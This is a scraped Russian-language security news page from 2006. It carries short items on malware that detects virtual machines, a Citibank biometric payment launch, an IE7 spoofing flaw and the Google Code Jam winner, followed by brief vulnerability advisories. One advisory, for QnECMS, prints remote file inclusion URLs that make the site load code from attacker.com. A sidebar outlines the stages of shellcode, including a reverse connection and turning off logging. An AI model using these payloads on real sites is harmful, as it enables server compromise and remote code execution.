 |
    |
|
|
 |
Новости Вирусописатели против виртуализации По словам аналитика SANS Institute's Internet Storm Center, авторы вирусов и прочих червей в последнее время стали вставлять в свой код проверки на исполнение в среде виртуальной машины, в первую очередь VMware. 2006-11-22
Citibank запустил биометрическую платежную систему Сингапурское подразделение Ситибанка объявило о запуске платежной системы Pay By Touch, которой могут воспользоваться владельцы Clear Platinum Card. Вместо возни с пластиковой карточкой теперь достаточно прикоснуться к сканеру отпечатков пальцев и ввести семизначный пин-код - разумеется, предварительно зарегистрировав свои отпечатки в одном из отделений банка. 2006-11-22
Не успела Microsoft выпустить новую версию Internet Explorer, как сразу начали появляться сообщения об узявимостях в этом браузере. Всед за уязвимостью при обработке тега "mhtml:" датская компания Secunia сообщает об уязвимости в механизме индикации в адресной строке всплывающего окна . Из-за ограничений в выводе в адресной строке специальных символов в поле URL, возникает возможность обмануть пользователя и провести атаку типа "фишинга". Уязвимость проверялась в Internet Explorer 7 в Windows XP SP2 system со всеми установленными патчами. В качестве рекомендации советуют не открывать ссылки полученные из неизвестных источников (или не использовать IE, естественно). Secunia подготовила тестовую страницу с демонстрацией уязвимости. 2006-10-31
Россия!!! Google Global Code Jam 2006. Google объявил победителей соревнования программистов Global Code Jam 2006.Напомним, что Code Jam, при поддержке TopCoder, начался в мае этого года, в целях выявить в рамках конкурса самых одаренных программистов Европы. Представители Google рассматривают данное мероприятие в качестве возможности для поиска талантливых программистов, которые могли бы пополнить штат компании.Как стало известно, победителем международного конкурса по программированию Google Global Code Jam 2006 стал студент механико-математического факультета МГУ Петр Митричев. Россиянин показал себя лучшим из 100 финалистов конкурса. Ему достался денежный приз в размере $10 тыс. 2006-10-31 Advisories
QnECMS <= 2.5.6 (adminfolderpath) Remote File Inclusion Exploit http://www.target.com/[path]/admin/include/footermain.php?adminfolderpath=http://attacker.com/evil? http://www.target.com/[path]/photogallery/headerscripts.php?adminfolderpath=http://attacker.com/evil? http://www.target.com/[path]/templates/headermain.php?adminfolderpath=http://attacker.com/evil?
Обход ограничений безопасности в MySQL Уязвимость существует из-за ошибки дизайна при проверке привилегий пользователя для выполнения команды MERGE. Злоумышленник может получить доступ к заранее созданной таблице с помощью MERGE, даже если привилегии на доступ были изменены.
Выполнение произвольного кода в Microsoft Office Удаленный пользователь может выполнить произвольный код на целевой системе.
Отказ в обслуживании при обработке IPv6 пакетов в Juniper Networks JUNOS. Удаленный пользователь может вызвать отказ в обслуживании.
|
|
Анатомия шеллкода • Выполнение кода • Восстановление использованной функции • Порождение процесса • Установка тepминaльного интepфeйcа • Создание обратного подключения TCB • Восстановление использованной функции • Запуск командной оболочки • Остановка процесса журналирования • Выход из иницированного процесса • Полный контроль 
Для администраторов
|
Copyright 2006 © Intech, Inc. All rights reserved.